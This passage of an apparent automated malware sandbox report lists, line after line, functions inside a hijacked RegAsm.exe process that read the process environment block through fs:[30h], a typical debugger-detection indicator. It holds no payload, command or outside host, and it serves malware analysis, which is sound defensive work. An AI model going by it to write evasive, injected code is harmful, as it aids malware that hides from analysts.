Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F7035C mov eax, dword ptr fs:[00000030h] 10_2_02F7035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F7035C mov ecx, dword ptr fs:[00000030h] 10_2_02F7035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F7035C mov eax, dword ptr fs:[00000030h] 10_2_02F7035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F7035C mov eax, dword ptr fs:[00000030h] 10_2_02F7035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FC5341 mov eax, dword ptr fs:[00000030h] 10_2_02FC5341
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EE9353 mov eax, dword ptr fs:[00000030h] 10_2_02EE9353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EE9353 mov eax, dword ptr fs:[00000030h] 10_2_02EE9353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h] 10_2_02F72349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h] 10_2_02F72349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h] 10_2_02F72349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h] 10_2_02F72349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h] 10_2_02F72349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h] 10_2_02F72349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h] 10_2_02F72349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h] 10_2_02F72349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h] 10_2_02F72349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h] 10_2_02F72349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h] 10_2_02F72349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h] 10_2_02F72349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h] 10_2_02F72349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h] 10_2_02F72349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h] 10_2_02F72349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FB132D mov eax, dword ptr fs:[00000030h] 10_2_02FB132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FB132D mov eax, dword ptr fs:[00000030h] 10_2_02FB132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F1F32A mov eax, dword ptr fs:[00000030h] 10_2_02F1F32A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EE7330 mov eax, dword ptr fs:[00000030h] 10_2_02EE7330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F10310 mov ecx, dword ptr fs:[00000030h] 10_2_02F10310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F2A30B mov eax, dword ptr fs:[00000030h] 10_2_02F2A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F2A30B mov eax, dword ptr fs:[00000030h] 10_2_02F2A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F2A30B mov eax, dword ptr fs:[00000030h] 10_2_02F2A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F7930B mov eax, dword ptr fs:[00000030h] 10_2_02F7930B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F7930B mov eax, dword ptr fs:[00000030h] 10_2_02F7930B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F7930B mov eax, dword ptr fs:[00000030h] 10_2_02F7930B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEC310 mov ecx, dword ptr fs:[00000030h] 10_2_02EEC310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F320F0 mov ecx, dword ptr fs:[00000030h] 10_2_02F320F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF80E9 mov eax, dword ptr fs:[00000030h] 10_2_02EF80E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEA0E3 mov ecx, dword ptr fs:[00000030h] 10_2_02EEA0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F150E4 mov eax, dword ptr fs:[00000030h] 10_2_02F150E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F150E4 mov ecx, dword ptr fs:[00000030h] 10_2_02F150E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F760E0 mov eax, dword ptr fs:[00000030h] 10_2_02F760E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEC0F0 mov eax, dword ptr fs:[00000030h] 10_2_02EEC0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FC50D9 mov eax, dword ptr fs:[00000030h] 10_2_02FC50D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F720DE mov eax, dword ptr fs:[00000030h] 10_2_02F720DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F190DB mov eax, dword ptr fs:[00000030h] 10_2_02F190DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F070C0 mov eax, dword ptr fs:[00000030h] 10_2_02F070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F070C0 mov ecx, dword ptr fs:[00000030h] 10_2_02F070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F070C0 mov ecx, dword ptr fs:[00000030h] 10_2_02F070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F070C0 mov eax, dword ptr fs:[00000030h] 10_2_02F070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F070C0 mov ecx, dword ptr fs:[00000030h] 10_2_02F070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F070C0 mov ecx, dword ptr fs:[00000030h] 10_2_02F070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F070C0 mov eax, dword ptr fs:[00000030h] 10_2_02F070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F070C0 mov eax, dword ptr fs:[00000030h] 10_2_02F070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F070C0 mov eax, dword ptr fs:[00000030h] 10_2_02F070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F070C0 mov eax, dword ptr fs:[00000030h] 10_2_02F070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F070C0 mov eax, dword ptr fs:[00000030h] 10_2_02F070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F070C0 mov eax, dword ptr fs:[00000030h] 10_2_02F070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F070C0 mov eax, dword ptr fs:[00000030h] 10_2_02F070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F070C0 mov eax, dword ptr fs:[00000030h] 10_2_02F070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F070C0 mov eax, dword ptr fs:[00000030h] 10_2_02F070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F070C0 mov eax, dword ptr fs:[00000030h] 10_2_02F070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F070C0 mov eax, dword ptr fs:[00000030h] 10_2_02F070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F070C0 mov eax, dword ptr fs:[00000030h] 10_2_02F070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F6D0C0 mov eax, dword ptr fs:[00000030h] 10_2_02F6D0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F6D0C0 mov eax, dword ptr fs:[00000030h] 10_2_02F6D0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FB60B8 mov eax, dword ptr fs:[00000030h] 10_2_02FB60B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FB60B8 mov ecx, dword ptr fs:[00000030h] 10_2_02FB60B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F880A8 mov eax, dword ptr fs:[00000030h] 10_2_02F880A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F1D090 mov eax, dword ptr fs:[00000030h] 10_2_02F1D090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F1D090 mov eax, dword ptr fs:[00000030h] 10_2_02F1D090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EED08D mov eax, dword ptr fs:[00000030h] 10_2_02EED08D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF208A mov eax, dword ptr fs:[00000030h] 10_2_02EF208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F2909C mov eax, dword ptr fs:[00000030h] 10_2_02F2909C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F7D080 mov eax, dword ptr fs:[00000030h] 10_2_02F7D080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F7D080 mov eax, dword ptr fs:[00000030h] 10_2_02F7D080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF5096 mov eax, dword ptr fs:[00000030h] 10_2_02EF5096
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F01070 mov eax, dword ptr fs:[00000030h] 10_2_02F01070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F01070 mov ecx, dword ptr fs:[00000030h] 10_2_02F01070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F01070 mov eax, dword ptr fs:[00000030h] 10_2_02F01070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F01070 mov eax, dword ptr fs:[00000030h] 10_2_02F01070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F01070 mov eax, dword ptr fs:[00000030h] 10_2_02F01070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F01070 mov eax, dword ptr fs:[00000030h] 10_2_02F01070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F01070 mov eax, dword ptr fs:[00000030h] 10_2_02F01070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F01070 mov eax, dword ptr fs:[00000030h] 10_2_02F01070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F01070 mov eax, dword ptr fs:[00000030h] 10_2_02F01070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F01070 mov eax, dword ptr fs:[00000030h] 10_2_02F01070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F01070 mov eax, dword ptr fs:[00000030h] 10_2_02F01070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F01070 mov eax, dword ptr fs:[00000030h] 10_2_02F01070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F01070 mov eax, dword ptr fs:[00000030h] 10_2_02F01070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F1C073 mov eax, dword ptr fs:[00000030h] 10_2_02F1C073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F6D070 mov ecx, dword ptr fs:[00000030h] 10_2_02F6D070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F7106E mov eax, dword ptr fs:[00000030h] 10_2_02F7106E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FC5060 mov eax, dword ptr fs:[00000030h] 10_2_02FC5060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F1B052 mov eax, dword ptr fs:[00000030h] 10_2_02F1B052
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F9705E mov ebx, dword ptr fs:[00000030h] 10_2_02F9705E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F9705E mov eax, dword ptr fs:[00000030h] 10_2_02F9705E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F76050 mov eax, dword ptr fs:[00000030h] 10_2_02F76050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF2050 mov eax, dword ptr fs:[00000030h] 10_2_02EF2050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FB903E mov eax, dword ptr fs:[00000030h] 10_2_02FB903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FB903E mov eax, dword ptr fs:[00000030h] 10_2_02FB903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FB903E mov eax, dword ptr fs:[00000030h] 10_2_02FB903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FB903E mov eax, dword ptr fs:[00000030h] 10_2_02FB903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEA020 mov eax, dword ptr fs:[00000030h] 10_2_02EEA020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEC020 mov eax, dword ptr fs:[00000030h] 10_2_02EEC020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F0E016 mov eax, dword ptr fs:[00000030h] 10_2_02F0E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F0E016 mov eax, dword ptr fs:[00000030h] 10_2_02F0E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F0E016 mov eax, dword ptr fs:[00000030h] 10_2_02F0E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F0E016 mov eax, dword ptr fs:[00000030h] 10_2_02F0E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F74000 mov ecx, dword ptr fs:[00000030h] 10_2_02F74000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F971F9 mov esi, dword ptr fs:[00000030h] 10_2_02F971F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF51ED mov eax, dword ptr fs:[00000030h] 10_2_02EF51ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F201F8 mov eax, dword ptr fs:[00000030h] 10_2_02F201F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FC61E5 mov eax, dword ptr fs:[00000030h] 10_2_02FC61E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F151EF mov eax, dword ptr fs:[00000030h] 10_2_02F151EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F151EF mov eax, dword ptr fs:[00000030h] 10_2_02F151EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F151EF mov eax, dword ptr fs:[00000030h] 10_2_02F151EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F151EF mov eax, dword ptr fs:[00000030h] 10_2_02F151EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F151EF mov eax, dword ptr fs:[00000030h] 10_2_02F151EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F151EF mov eax, dword ptr fs:[00000030h] 10_2_02F151EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F151EF mov eax, dword ptr fs:[00000030h] 10_2_02F151EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F151EF mov eax, dword ptr fs:[00000030h] 10_2_02F151EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F151EF mov eax, dword ptr fs:[00000030h] 10_2_02F151EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F151EF mov eax, dword ptr fs:[00000030h] 10_2_02F151EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F151EF mov eax, dword ptr fs:[00000030h] 10_2_02F151EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F151EF mov eax, dword ptr fs:[00000030h] 10_2_02F151EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F151EF mov eax, dword ptr fs:[00000030h] 10_2_02F151EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F2D1D0 mov eax, dword ptr fs:[00000030h] 10_2_02F2D1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F2D1D0 mov ecx, dword ptr fs:[00000030h] 10_2_02F2D1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F6E1D0 mov eax, dword ptr fs:[00000030h] 10_2_02F6E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F6E1D0 mov eax, dword ptr fs:[00000030h] 10_2_02F6E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F6E1D0 mov ecx, dword ptr fs:[00000030h] 10_2_02F6E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F6E1D0 mov eax, dword ptr fs:[00000030h] 10_2_02F6E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F6E1D0 mov eax, dword ptr fs:[00000030h] 10_2_02F6E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FC51CB mov eax, dword ptr fs:[00000030h] 10_2_02FC51CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FB61C3 mov eax, dword ptr fs:[00000030h] 10_2_02FB61C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FB61C3 mov eax, dword ptr fs:[00000030h] 10_2_02FB61C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F0B1B0 mov eax, dword ptr fs:[00000030h] 10_2_02F0B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA11A4 mov eax, dword ptr fs:[00000030h] 10_2_02FA11A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA11A4 mov eax, dword ptr fs:[00000030h] 10_2_02FA11A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA11A4 mov eax, dword ptr fs:[00000030h] 10_2_02FA11A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA11A4 mov eax, dword ptr fs:[00000030h] 10_2_02FA11A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F47190 mov eax, dword ptr fs:[00000030h] 10_2_02F47190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F7019F mov eax, dword ptr fs:[00000030h] 10_2_02F7019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F7019F mov eax, dword ptr fs:[00000030h] 10_2_02F7019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F7019F mov eax, dword ptr fs:[00000030h] 10_2_02F7019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F7019F mov eax, dword ptr fs:[00000030h] 10_2_02F7019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FAC188 mov eax, dword ptr fs:[00000030h] 10_2_02FAC188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FAC188 mov eax, dword ptr fs:[00000030h] 10_2_02FAC188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F30185 mov eax, dword ptr fs:[00000030h] 10_2_02F30185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEA197 mov eax, dword ptr fs:[00000030h] 10_2_02EEA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEA197 mov eax, dword ptr fs:[00000030h] 10_2_02EEA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEA197 mov eax, dword ptr fs:[00000030h] 10_2_02EEA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F89179 mov eax, dword ptr fs:[00000030h] 10_2_02F89179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEF172 mov eax, dword ptr fs:[00000030h] 10_2_02EEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEF172 mov eax, dword ptr fs:[00000030h] 10_2_02EEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEF172 mov eax, dword ptr fs:[00000030h] 10_2_02EEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEF172 mov eax, dword ptr fs:[00000030h] 10_2_02EEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEF172 mov eax, dword ptr fs:[00000030h] 10_2_02EEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEF172 mov eax, dword ptr fs:[00000030h] 10_2_02EEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEF172 mov eax, dword ptr fs:[00000030h] 10_2_02EEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEF172 mov eax, dword ptr fs:[00000030h] 10_2_02EEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEF172 mov eax, dword ptr fs:[00000030h] 10_2_02EEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEF172 mov eax, dword ptr fs:[00000030h] 10_2_02EEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEF172 mov eax, dword ptr fs:[00000030h] 10_2_02EEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEF172 mov eax, dword ptr fs:[00000030h] 10_2_02EEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEF172 mov eax, dword ptr fs:[00000030h] 10_2_02EEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEF172 mov eax, dword ptr fs:[00000030h] 10_2_02EEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEF172 mov eax, dword ptr fs:[00000030h] 10_2_02EEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEF172 mov eax, dword ptr fs:[00000030h] 10_2_02EEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEF172 mov eax, dword ptr fs:[00000030h] 10_2_02EEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEF172 mov eax, dword ptr fs:[00000030h] 10_2_02EEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEF172 mov eax, dword ptr fs:[00000030h] 10_2_02EEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEF172 mov eax, dword ptr fs:[00000030h] 10_2_02EEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEF172 mov eax, dword ptr fs:[00000030h] 10_2_02EEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F88158 mov eax, dword ptr fs:[00000030h] 10_2_02F88158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EE9148 mov eax, dword ptr fs:[00000030h] 10_2_02EE9148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EE9148 mov eax, dword ptr fs:[00000030h] 10_2_02EE9148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EE9148 mov eax, dword ptr fs:[00000030h] 10_2_02EE9148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EE9148 mov eax, dword ptr fs:[00000030h] 10_2_02EE9148
